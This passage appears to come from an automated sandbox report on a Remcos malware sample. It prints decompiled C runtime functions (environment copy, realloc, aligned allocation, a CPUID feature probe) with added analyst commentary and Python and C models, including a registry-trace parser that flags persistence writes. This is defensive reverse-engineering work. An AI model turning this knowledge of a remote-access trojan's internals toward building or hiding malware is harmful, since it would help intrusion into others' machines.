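    (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x00010000, "DELETE"), (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"), (0x00080000, "WRITE_OWNER"),
]

LINE_RE = re.compile(r"^[•*-]?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$")


def parse_trace(text):
    """One dict per trace line: api, module, raw argument strings, call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module,
                          "args": [a.strip() for a in args.split(",")], "ref": ref})
    return calls


def hexarg(arg):
    """Hex stack slot as an int, or None for the '?' placeholder."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_access(mask):
    """Name a samDesired value, e.g. 0x20019 -> KEY_READ."""
    if mask in KEY_COMPOSITES:
        return KEY_COMPOSITES[mask]
    names = [name for bit, name in KEY_BITS if mask & bit]
    return "|".join(names) if names else "0"


def summarize(calls):
    """Walk the calls in order and attach the root key of the most recent
    RegOpenKeyExA/RegCreateKeyA to the RegSetValueExA/RegQueryValueExA that
    uses its (unresolved) handle. Returns (ref, api, root, operation) tuples."""
    current_root, rows = None, []
    for c in calls:
        api, args = c["api"], c["args"]
        if api in ("RegCreateKeyA", "RegOpenKeyExA"):
            current_root = HKEY_ROOTS.get(hexarg(args[0]), "unknown")
            op = "create" if api == "RegCreateKeyA" else decode_access(hexarg(args[3]) or 0)
            rows.append((c["ref"], api, current_root, op))
        elif api in ("RegSetValueExA", "RegQueryValueExA"):
            rows.append((c["ref"], api, current_root,
                         "write" if api == "RegSetValueExA" else "read"))
        elif api == "RegCloseKey":
            current_root = None
    return rows


def hkcu_writes(rows):
    """Rows that write a value under HKEY_CURRENT_USER: persistence candidates."""
    return [r for r in rows if r[1] == "RegSetValueExA" and r[2] == "HKEY_CURRENT_USER"]


if __name__ == "__main__":
    for row in summarize(parse_trace(SAMPLE_TRACE)):
        print("%s %-17s %-19s %s" % row)
```

Run on the sample, the only write lands at 0x00410ADE under HKEY_CURRENT_USER, the reads at 0x00410923 and 0x004108C3 are KEY_READ opens of HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER respectively; the value names behind the ? slots still have to be taken from the disassembly or a memory dump.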

                                    C-Code - Quality: 100%
			E0044765D(void* __ecx) {
				// CRT-style private copy of the process environment block (an assumption
				// from structure): GetEnvironmentStringsW returns a double-NUL-terminated
				// UTF-16 block; L004475A3 presumably returns a pointer to its end, so the
				// doubled (end - start >> 1) expression is the byte length. E0043F98C
				// allocates (it is also the NULL-pointer fallback of the realloc wrapper
				// E0043F9DA below, i.e. malloc), E004324E0 copies, and E004401F5 is _free
				// (the trace tags it _free.LIBCMT).
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (L004475A3(_t19) - _t19 >> 1) + (L004475A3(_t19) - _t19 >> 1);   // byte length of the block
					_t6 = E0043F98C(_t14, (L004475A3(_t19) - _t19 >> 1) + (L004475A3(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E004324E0(_t18, _t19, _t12);         // memcpy(copy, block, bytes)
					}
					E004401F5(0);                            // _free(0): no-op
					FreeEnvironmentStringsW(_t19);           // release the system-owned block
				} else {
					_t18 = 0;
				}
				return _t18;                                 // heap copy, or NULL on failure
			}

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                                    • _free.LIBCMT ref: 0044769A
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EnvironmentStrings$Free_free
                                    • String ID:
                                    • API String ID: 2716640707-0
                                    • Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                                    • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                                    • Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                                    • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%
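E0043D15F and E0044765D above are C runtime start-up code rather than Remcos logic: together they copy the process environment block and split it into an array of entries. The Python model below is an added example for this page (not code from the sample or from the CRT) that reproduces that logic on a constructed UTF-16LE block, so the two decompiled loops can be checked against a readable version; the '=' skip and the double-NUL terminator handling are the details worth recognising when triaging similar functions. That the two routines are the CRT's create_environment/copy-environment pair is an inference from their structure.

```python
# Constructed sample block: four entries, each NUL-terminated, plus the final
# NUL that ends the block, encoded as Windows hands it out (UTF-16LE). Two of
# the entries start with '=' (the hidden per-drive current-directory entries).
SAMPLE_BLOCK = "".join(entry + "\x00" for entry in [
    "=C:=C:\\Users\\analyst",
    "PATH=C:\\Windows\\System32",
    "USERNAME=analyst",
    "=ExitCode=00000000",
]).encode("utf-16-le") + b"\x00\x00"


def copy_environment_block(raw):
    """Model of E0044765D: find the double NUL that ends a UTF-16LE block
    (scanning in whole wide characters, like the pointer arithmetic in the
    decompiled code) and return a private copy of exactly that many bytes."""
    if len(raw) % 2:
        raise ValueError("UTF-16LE block must have an even length")
    pos = 0
    while True:
        end = pos
        while raw[end:end + 2] != b"\x00\x00":   # scan to the NUL ending this entry
            end += 2
            if end >= len(raw):
                raise ValueError("block is not double-NUL terminated")
        if end == pos:                            # empty entry: the block terminator
            return bytes(raw[:end + 2])
        pos = end + 2


def create_environment(raw):
    """Model of E0043D15F: split the copied block into entries, drop those whose
    first character is '=', and return the kept entries (the C code returns a
    NULL-terminated array of freshly allocated wide-string copies)."""
    text = raw.decode("utf-16-le")
    if not text.endswith("\x00\x00"):
        raise ValueError("block is not double-NUL terminated")
    kept = []
    for entry in text[:-2].split("\x00"):         # each entry ends in exactly one NUL
        if entry == "":                           # an empty entry is the terminator: stop like the C loop
            break
        if not entry.startswith("="):             # the '=' check of the counting and copying loops
            kept.append(entry)
    return kept


if __name__ == "__main__":
    block = copy_environment_block(SAMPLE_BLOCK + b"\x41\x00\x42\x00")  # trailing junk is ignored
    for entry in create_environment(block):
        print(entry)
```

On the sample the copy stops exactly at the double NUL and the split keeps only PATH and USERNAME, which is what the counting loop's `!= 0x3d` test and the copying loop's `== 0x3d` skip achieve in the decompiled code.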

                                    C-Code - Quality: 96%
			E0043F9DA(void* __ecx, void* _a4, long _a8) {
				// CRT _realloc_base pattern (an assumption from structure): realloc(_a4, _a8).
				//   _a4 == NULL        -> plain allocation via E0043F98C (malloc)
				//   _a8 == 0           -> free the block and return NULL
				//   _a8 > 0xFFFFFFE0   -> too large for the heap: errno = ENOMEM (0xc), return NULL
				//   otherwise          -> RtlReAllocateHeap on the CRT heap (*0x46ba48); when that
				//                         fails and a new-handler is installed (L0043ED9A / L0043C819)
				//                         call it and retry, else errno = ENOMEM and return NULL.
				void* __esi;
				void* _t4;
				long _t7;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x46ba48, 0, _t13, _t15); // executed   (*0x46ba48 = CRT heap handle)
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = L0043ED9A();          // is a new-handler installed?
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = L0043C819(_t10, _t15, __eflags, _t15);   // run it; non-zero means retry
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(L0043A504())) = 0xc;  // *_errno() = ENOMEM
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E004401F5(_t13);                         // size 0: free and return NULL
					goto L6;
				}
				return E0043F98C(__ecx, _a8);                // NULL pointer: behave as malloc(size)
                                    			}

                                    Instruction address per C-code line above (the side-by-side column layout was lost in extraction; 0x00000000 marks lines with no instruction):
                                    0x0043f9da
                                    0x0043f9e0
                                    0x0043f9e5
                                    0x0043f9f3
                                    0x0043f9f6
                                    0x0043f9f8
                                    0x0043fa03
                                    0x0043fa06
                                    0x0043fa2d
                                    0x0043fa37
                                    0x0043fa3d
                                    0x0043fa3f
                                    0x00000000
                                    0x00000000
                                    0x0043fa1e
                                    0x0043fa20
                                    0x00000000
                                    0x00000000
                                    0x0043fa23
                                    0x0043fa28
                                    0x0043fa29
                                    0x0043fa2b
                                    0x00000000
                                    0x00000000
                                    0x0043fa2b
                                    0x0043fa15
                                    0x00000000
                                    0x0043fa15
                                    0x0043fa08
                                    0x0043fa0d
                                    0x0043fa13
                                    0x0043fa13
                                    0x0043fa13
                                    0x00000000
                                    0x0043fa13
                                    0x0043f9fb
                                    0x00000000
                                    0x0043fa00
                                    0x00000000

                                    APIs
                                    • _free.LIBCMT ref: 0043F9FB
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    • RtlReAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000001,?,0040F572,?,?,?,0040F89B), ref: 0043FA37
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap$_free
                                    • String ID:
                                    • API String ID: 1482568997-0
                                    • Opcode ID: 2da6057b54420b98b414b5f2f5752362a39b033e3997954cd58d08120b522eeb
                                    • Instruction ID: 409074293b3810aa7ddd1280863e7d0579cbe773a19cb3134e1aa8b6ea316b44
                                    • Opcode Fuzzy Hash: 2da6057b54420b98b414b5f2f5752362a39b033e3997954cd58d08120b522eeb
                                    • Instruction Fuzzy Hash: 08F0C832E0121275CB217A26BC00B5B27588FC9765F11613BF829A6291DE3CD80582AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E00401646(signed int _a4, signed int _a8, char _a12) {
                                    				// Allocator wrapper (count, element size, alignment flag), consistent with the
                                    				// MSVC STL's std::_Allocate helpers: reject count*size overflow, then either a
                                    				// plain heap allocation (E0042F218) or, for blocks of 0x1000 bytes and up when
                                    				// _a12 is set, over-allocate by 0x23 and round the pointer up to a 32-byte
                                    				// boundary, storing the raw pointer in the slot just below the aligned block.
                                    				// Everything after label L3 belongs to other functions (see the comment there).
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				signed int _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				void* __esi;
                                    				signed int _t59;
                                    				signed int _t60;
                                    				signed int _t62;
                                    				signed int _t70;
                                    				intOrPtr _t78;
                                    				signed int _t80;
                                    				signed int _t84;
                                    				signed int _t85;
                                    				intOrPtr _t86;
                                    				signed int _t87;
                                    				signed int _t89;
                                    				intOrPtr _t90;
                                    				intOrPtr _t96;
                                    				intOrPtr _t97;
                                    				intOrPtr* _t99;
                                    				signed int _t100;
                                    				signed int _t101;
                                    				signed int _t103;
                                    				intOrPtr _t111;
                                    				signed int _t119;
                                    				intOrPtr* _t121;
                                    				signed int _t122;
                                    				signed int _t124;
                                    				void* _t126;
                                    				void* _t132;
                                    				void* _t133;
                                    				void* _t135;
                                    				void* _t136;
                                    
                                    				_t100 = _a4;
                                    				if(_t100 != 0) {
                                    					_t60 = _t59 | 0xffffffff;                 // 0xffffffff
                                    					_t119 = _t60 % _a8;
                                    					__eflags = _t60 / _a8 - _t100;
                                    					if(_t60 / _a8 >= _t100) {                 // count * size fits in 32 bits
                                    						_t101 = _t100 * _a8;
                                    						__eflags = _a12;
                                    						if(__eflags == 0) {
                                    							L8:
                                    							_t62 = E0042F218(_t119, _t126, __eflags, _t101); // executed
                                    							_t103 = _t62;
                                    							goto L9;
                                    						} else {
                                    							__eflags = _t101 - 0x1000;
                                    							if(__eflags < 0) {
                                    								goto L8;
                                    							} else {
                                    								_t64 = _t101 + 0x23;                    // 31 bytes of alignment slack + 4 for the stored raw pointer
                                    								__eflags = _t101 + 0x23 - _t101;
                                    								if(__eflags <= 0) {                     // size + 0x23 wrapped around
                                    									goto L3;
                                    								} else {
                                    									_t90 = E0042F218(_t119, _t126, __eflags, _t64);
                                    									_t11 = _t90 + 0x23; // 0x23
                                    									_t103 = _t11 & 0xffffffe0;           // round up to a 32-byte boundary
                                    									 *((intOrPtr*)(_t103 - 4)) = _t90;   // raw pointer kept just below the aligned block for the matching free
                                    									L9:
                                    									return _t103;
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						L3:
                                    						// Error path. The address column below jumps from 0x00401660 straight to
                                    						// 0x0042f97b here: the decompiler did not treat the callee as non-returning and
                                    						// ran on into the functions that follow it in the binary. What comes next is two
                                    						// helpers that build an object, call E0043205A and end in int3 (throw stubs that
                                    						// never return), then a separate CPU feature probe. None of it is reached from
                                    						// E00401646; read it as the start-up ISA detection it is.
                                    						_t132 = _t135;
                                    						_t136 = _t135 - 0xc;
                                    						L0042F92F( &_v20);
                                    						E0043205A( &_v20, 0x467c9c);
                                    						asm("int3");
                                    						_push(_t132);
                                    						_t133 = _t136;
                                    						L0042F962( &_v36);
                                    						_t70 = E0043205A( &_v36, 0x467cd4);
                                    						asm("int3");
                                    						_push(_t133);
                                    						 *0x46ad0c =  *0x46ad0c & 0x00000000;   // ISA level word, reset to 0 (baseline x86)
                                    						 *0x46a010 =  *0x46a010 | 1;            // ISA-enabled bitmask, bit 0 = x86
                                    						_push(0xa);
                                    						L0045077A();                            // feature-present query with argument 10 (PF_XMMI64_INSTRUCTIONS_AVAILABLE, i.e. SSE2)
                                    						__eflags = _t70;
                                    						if(_t70 != 0) {
                                    							_v32 = _v32 & 0x00000000;           // CPUID(7).EBX placeholder, stays 0 if leaf 7 is unavailable
                                    							 *0x46a010 =  *0x46a010 | 0x00000002;
                                    							_push(_t126);
                                    							 *0x46ad0c = 1;                      // ISA level 1 (SSE2)
                                    							_t121 =  &_v56;
                                    							_push(1);
                                    							asm("cpuid");
                                    							_pop(_t96);
                                    							 *_t121 = 0;
                                    							 *((intOrPtr*)(_t121 + 4)) = 1;
                                    							 *((intOrPtr*)(_t121 + 8)) = 0;
                                    							 *(_t121 + 0xc) = _t119;
                                    							_v24 = _v56;
                                    							// CPUID(0) vendor test: EBX^"Genu" | ECX^"ntel" | EDX^"ineI" is zero only for "GenuineIntel"
                                    							__eflags = _v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547;
                                    							_t78 = 1;
                                    							_t111 = 0;
                                    							_push(1);
                                    							asm("cpuid");
                                    							_pop(_t97);
                                    							 *_t121 = _t78;
                                    							 *((intOrPtr*)(_t121 + 4)) = _t96;
                                    							 *((intOrPtr*)(_t121 + 8)) = _t111;
                                    							 *(_t121 + 0xc) = _t119;
                                    							if((_v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547) != 0) {
                                    								L21:
                                    								_t122 =  *0x46ad10;
                                    							} else {
                                    								_t89 = _v56 & 0x0fff3ff0;          // CPUID(1).EAX minus stepping and reserved bits: ext. family/model, family, model
                                    								__eflags = _t89 - 0x106c0;
                                    								if(_t89 == 0x106c0) {              // family 6, models 0x1c/0x26/0x27/0x35/0x36/0x37 (Intel Atom parts)
                                    									L20:
                                    									_t122 =  *0x46ad10 | 0x00000001;   // bit 0 of the code-path preference word
                                    									 *0x46ad10 = _t122;
                                    								} else {
                                    									__eflags = _t89 - 0x20660;
                                    									if(_t89 == 0x20660) {
                                    										goto L20;
                                    									} else {
                                    										__eflags = _t89 - 0x20670;
                                    										if(_t89 == 0x20670) {
                                    											goto L20;
                                    										} else {
                                    											__eflags = _t89 - 0x30650;
                                    											if(_t89 == 0x30650) {
                                    												goto L20;
                                    											} else {
                                    												__eflags = _t89 - 0x30660;
                                    												if(_t89 == 0x30660) {
                                    													goto L20;
                                    												} else {
                                    													__eflags = _t89 - 0x30670;
                                    													if(_t89 != 0x30670) {
                                    														goto L21;
                                    													} else {
                                    														goto L20;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							__eflags = _v24 - 7;
                                    							_v40 = _v44;
                                    							_t80 = _v48;
                                    							_v20 = _t80;
                                    							_v36 = _t80;
                                    							if(_v24 >= 7) {
                                    								_t86 = 7;
                                    								_push(_t97);
                                    								asm("cpuid");
                                    								_t99 =  &_v56;
                                    								 *_t99 = _t86;
                                    								 *((intOrPtr*)(_t99 + 4)) = _t97;
                                    								 *((intOrPtr*)(_t99 + 8)) = 0;
                                    								 *(_t99 + 0xc) = _t119;
                                    								_t87 = _v52;                         // CPUID(7).EBX
                                    								__eflags = _t87 & 0x00000200;        // bit 9: ERMS (enhanced rep movsb/stosb)
                                    								_v32 = _t87;
                                    								_t80 = _v20;                         // CPUID(1).ECX
                                    								if((_t87 & 0x00000200) != 0) {
                                    									_t124 = _t122 | 0x00000002;      // bit 1 of the code-path preference word
                                    									__eflags = _t124;
                                    									 *0x46ad10 = _t124;
                                    								}
                                    							}
                                    							__eflags = _t80 & 0x00100000;            // CPUID(1).ECX bit 20: SSE4.2
                                    							if((_t80 & 0x00100000) != 0) {
                                    								 *0x46a010 =  *0x46a010 | 0x00000004;
                                    								 *0x46ad0c = 2;                       // ISA level 2 (SSE4.2)
                                    								__eflags = _t80 & 0x08000000;        // bit 27: OSXSAVE
                                    								if((_t80 & 0x08000000) != 0) {
                                    									__eflags = _t80 & 0x10000000;    // bit 28: AVX
                                    									if((_t80 & 0x10000000) != 0) {
                                    										asm("xgetbv");               // read XCR0
                                    										_v28 = _t80;
                                    										_v24 = _t119;
                                    										__eflags = (_v28 & 0x00000006) - 6;
                                    										if((_v28 & 0x00000006) == 6) {   // OS saves both XMM and YMM state
                                    											__eflags = 0;
                                    											if(0 == 0) {
                                    												_t84 =  *0x46a010 | 0x00000008;
                                    												 *0x46ad0c = 3;                  // ISA level 3 (AVX)
                                    												__eflags = _v32 & 0x00000020;    // CPUID(7).EBX bit 5: AVX2
                                    												 *0x46a010 = _t84;
                                    												if((_v32 & 0x00000020) != 0) {
                                    													_t85 = _t84 | 0x00000020;
                                    													__eflags = _t85;
                                    													 *0x46ad0c = 5;              // ISA level 5 (AVX2)
                                    													 *0x46a010 = _t85;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    						__eflags = 0;
                                    						return 0;
                                    					}
                                    				} else {
                                    					return 0;
                                    				}
                                    			}

                                    Instruction address per C-code line above (the side-by-side column layout was lost in extraction; note the jump from 0x00401660 to 0x0042f97b at label L3):
                                    0x00401649
                                    0x0040164e
                                    0x00401654
                                    0x00401659
                                    0x0040165c
                                    0x0040165e
                                    0x00401665
                                    0x00401669
                                    0x0040166d
                                    0x00401690
                                    0x00401691
                                    0x00401697
                                    0x00000000
                                    0x0040166f
                                    0x0040166f
                                    0x00401675
                                    0x00000000
                                    0x00401677
                                    0x00401677
                                    0x0040167a
                                    0x0040167c
                                    0x00000000
                                    0x0040167e
                                    0x0040167f
                                    0x00401685
                                    0x00401688
                                    0x0040168b
                                    0x00401699
                                    0x0040169c
                                    0x0040169c
                                    0x0040167c
                                    0x00401675
                                    0x00401660
                                    0x00401660
                                    0x0042f97b
                                    0x0042f97d
                                    0x0042f983
                                    0x0042f991
                                    0x0042f996
                                    0x0042f997
                                    0x0042f998
                                    0x0042f9a0
                                    0x0042f9ae
                                    0x0042f9b3
                                    0x0042f9b4
                                    0x0042f9b7
                                    0x0042f9c5
                                    0x0042f9cb
                                    0x0042f9cd
                                    0x0042f9d2
                                    0x0042f9d4
                                    0x0042f9da
                                    0x0042f9e0
                                    0x0042f9e9
                                    0x0042f9eb
                                    0x0042f9f1
                                    0x0042f9f4
                                    0x0042f9f5
                                    0x0042f9f9
                                    0x0042f9fa
                                    0x0042f9fc
                                    0x0042f9ff
                                    0x0042fa02
                                    0x0042fa0b
                                    0x0042fa28
                                    0x0042fa2a
                                    0x0042fa2d
                                    0x0042fa2e
                                    0x0042fa2f
                                    0x0042fa33
                                    0x0042fa34
                                    0x0042fa36
                                    0x0042fa39
                                    0x0042fa3c
                                    0x0042fa3f
                                    0x0042fa84
                                    0x0042fa84
                                    0x0042fa41
                                    0x0042fa44
                                    0x0042fa49
                                    0x0042fa4e
                                    0x0042fa73
                                    0x0042fa79
                                    0x0042fa7c
                                    0x0042fa50
                                    0x0042fa50
                                    0x0042fa55
                                    0x00000000
                                    0x0042fa57
                                    0x0042fa57
                                    0x0042fa5c
                                    0x00000000
                                    0x0042fa5e
                                    0x0042fa5e
                                    0x0042fa63
                                    0x00000000
                                    0x0042fa65
                                    0x0042fa65
                                    0x0042fa6a
                                    0x00000000
                                    0x0042fa6c
                                    0x0042fa6c
                                    0x0042fa71
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0042fa71
                                    0x0042fa6a
                                    0x0042fa63
                                    0x0042fa5c
                                    0x0042fa55
                                    0x0042fa4e
                                    0x0042fa8a
                                    0x0042fa91
                                    0x0042fa94
                                    0x0042fa97
                                    0x0042fa9a
                                    0x0042fa9d
                                    0x0042faa1
                                    0x0042faa4
                                    0x0042faa5
                                    0x0042faaa
                                    0x0042faad
                                    0x0042faaf
                                    0x0042fab2
                                    0x0042fab5
                                    0x0042fab8
                                    0x0042fabb
                                    0x0042fac0
                                    0x0042fac3
                                    0x0042fac6
                                    0x0042fac8
                                    0x0042fac8
                                    0x0042facb
                                    0x0042facb
                                    0x0042fac6
                                    0x0042fad3
                                    0x0042fad8
                                    0x0042fada
                                    0x0042fae1
                                    0x0042faeb
                                    0x0042faf0
                                    0x0042faf2
                                    0x0042faf7
                                    0x0042fafb
                                    0x0042fafe
                                    0x0042fb01
                                    0x0042fb0f
                                    0x0042fb12
                                    0x0042fb14
                                    0x0042fb16
                                    0x0042fb1d
                                    0x0042fb20
                                    0x0042fb2a
                                    0x0042fb2e
                                    0x0042fb33
                                    0x0042fb35
                                    0x0042fb35
                                    0x0042fb38
                                    0x0042fb42
                                    0x0042fb42
                                    0x0042fb33
                                    0x0042fb16
                                    0x0042fb12
                                    0x0042faf7
                                    0x0042faf0
                                    0x0042fad8
                                    0x0042fb47
                                    0x0042fb4d
                                    0x0042fb4d
                                    0x00401650
                                    0x00401653
                                    0x00401653

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                                    • Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
                                    • Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                                    • Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C
                                    Uniqueness

                                    Uniqueness Score: -1.00%
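The CPU-feature probe that the decompiler appended to E00401646 is easier to read once its constants are decoded. The block below is an added example, not code from the report or from the sample: it takes CPUID register values as plain arguments (it executes no cpuid itself), rebuilds the vendor string from the three XOR constants, applies the 0x0fff3ff0 mask and the six signature comparands, and reproduces the ISA-level and preference-word logic of the listing. Function names and the constructed register values are mine. The constants and control flow match the MSVC CRT's start-up ISA-availability probe, so an analyst can treat that part of the listing as statically linked runtime code rather than payload logic.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Register constants the listing XORs against the CPUID(0) vendor string.
   Each is a little-endian packing of four ASCII bytes. */
#define VENDOR_EBX 0x756e6547u  /* "Genu" */
#define VENDOR_EDX 0x49656e69u  /* "ineI" */
#define VENDOR_ECX 0x6c65746eu  /* "ntel" */

/* Mask the listing applies to CPUID(1).EAX: keeps extended family (bits 20-27),
   extended model (16-19), family (8-11) and model (4-7); drops stepping (0-3). */
#define SIG_MASK 0x0fff3ff0u

/* Unpack EBX, EDX, ECX (the order CPUID reports them) into a 12-char vendor id. */
void vendor_string(uint32_t ebx, uint32_t edx, uint32_t ecx, char out[13]) {
    const uint32_t regs[3] = { ebx, edx, ecx };
    for (int r = 0; r < 3; r++)
        for (int i = 0; i < 4; i++)
            out[r * 4 + i] = (char)((regs[r] >> (8 * i)) & 0xffu);
    out[12] = '\0';
}

/* Same as vendor_string but returns a static buffer (not thread-safe). */
const char *vendor_cstr(uint32_t ebx, uint32_t edx, uint32_t ecx) {
    static char buf[13];
    vendor_string(ebx, edx, ecx, buf);
    return buf;
}

/* Exactly the listing's test: the OR of three XORs is zero only for GenuineIntel. */
int is_genuine_intel(uint32_t ebx, uint32_t edx, uint32_t ecx) {
    return ((ebx ^ VENDOR_EBX) | (edx ^ VENDOR_EDX) | (ecx ^ VENDOR_ECX)) == 0;
}

/* Display family per Intel's rule: extended family is added only when family == 15. */
unsigned display_family(uint32_t eax1) {
    unsigned fam = (eax1 >> 8) & 0xfu;
    if (fam == 0xf) fam += (eax1 >> 20) & 0xffu;
    return fam;
}

/* Display model: extended model is prepended only for family 6 and 15. */
unsigned display_model(uint32_t eax1) {
    unsigned base_fam = (eax1 >> 8) & 0xfu, mod = (eax1 >> 4) & 0xfu;
    if (base_fam == 0x6 || base_fam == 0xf) mod |= ((eax1 >> 16) & 0xfu) << 4;
    return mod;
}

/* The six masked signatures the listing compares against
   (family 6, models 0x1c, 0x26, 0x27, 0x35, 0x36, 0x37). */
int is_listed_signature(uint32_t eax1) {
    static const uint32_t sigs[] = { 0x106c0u, 0x20660u, 0x20670u,
                                     0x30650u, 0x30660u, 0x30670u };
    uint32_t sig = eax1 & SIG_MASK;
    for (size_t i = 0; i < sizeof sigs / sizeof sigs[0]; i++)
        if (sig == sigs[i]) return 1;
    return 0;
}

/* The word at 0x46ad10 in the listing: bit 0 for a listed Intel signature,
   bit 1 when leaf 7 exists and CPUID(7).EBX bit 9 (ERMS) is set. */
uint32_t favor_flags(uint32_t ebx0, uint32_t edx0, uint32_t ecx0,
                     uint32_t eax1, uint32_t max_leaf, uint32_t ebx7) {
    uint32_t flags = 0;
    if (is_genuine_intel(ebx0, edx0, ecx0) && is_listed_signature(eax1)) flags |= 1u;
    if (max_leaf >= 7 && (ebx7 & 0x200u)) flags |= 2u;
    return flags;
}

/* The level written to 0x46ad0c: 0 baseline x86, 1 SSE2, 2 SSE4.2, 3 AVX, 5 AVX2.
   sse2_present stands in for the listing's feature-present call with argument 10. */
int isa_level(int sse2_present, uint32_t ecx1, uint32_t max_leaf,
              uint32_t ebx7, uint64_t xcr0) {
    if (!sse2_present) return 0;
    if (!(ecx1 & 0x00100000u)) return 1;            /* ECX bit 20: SSE4.2 */
    if (!(ecx1 & 0x08000000u)) return 2;            /* ECX bit 27: OSXSAVE */
    if (!(ecx1 & 0x10000000u)) return 2;            /* ECX bit 28: AVX */
    if ((xcr0 & 6u) != 6u) return 2;                /* XCR0 bits 1-2: XMM and YMM state enabled */
    if (max_leaf >= 7 && (ebx7 & 0x20u)) return 5;  /* CPUID(7).EBX bit 5: AVX2 */
    return 3;
}

int main(void) {
    /* Constructed sample: the vendor words from the listing and a CPUID(1).EAX of
       0x000106c2 (family 6, model 0x1c, stepping 2), one of the listed signatures. */
    printf("vendor=%s family=%u model=0x%x listed=%d favor=%u isa=%d\n",
           vendor_cstr(VENDOR_EBX, VENDOR_EDX, VENDOR_ECX),
           display_family(0x000106c2u), display_model(0x000106c2u),
           is_listed_signature(0x000106c2u),
           favor_flags(VENDOR_EBX, VENDOR_EDX, VENDOR_ECX, 0x000106c2u, 7, 0x200u),
           isa_level(1, 0x18100000u, 7, 0x20u, 6u));
    return 0;
}
```

Feeding the three vendor constants through vendor_cstr yields "GenuineIntel"; an "AuthenticAMD" machine fails is_genuine_intel, so the signature branch is skipped and bit 0 of the preference word is never set, exactly as the listing's goto L21 path shows.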

                                    C-Code - Quality: 92%
                                    			E0043CFE1(void* __ebx, void* __ecx) {
                                    				// One-time environment set-up, the shape of the CRT's environment-table
                                    				// initialisation: already done if *0x46b4d0 is non-zero (returns 0); otherwise
                                    				// obtain the environment block (E004472D9 / L004475DA), build the table
                                    				// (E0043D08E) into *0x46b4dc, free the temporaries, return 0 or -1 on failure.
                                    				// E0043D03A below has the same shape on a second set of globals (0x46b4d4/0x46b4d8).
                                    				void* _t2;
                                    				intOrPtr _t3;
                                    				signed int _t15;
                                    				signed int _t16;
                                    
                                    				if( *0x46b4d0 == 0) {
                                    					_push(_t15);
                                    					E004472D9(__ecx); // executed
                                    					_t2 = L004475DA(); // executed
                                    					_t19 = _t2;
                                    					if(_t2 != 0) {
                                    						_t3 = E0043D08E(__ebx, _t19);
                                    						if(_t3 != 0) {
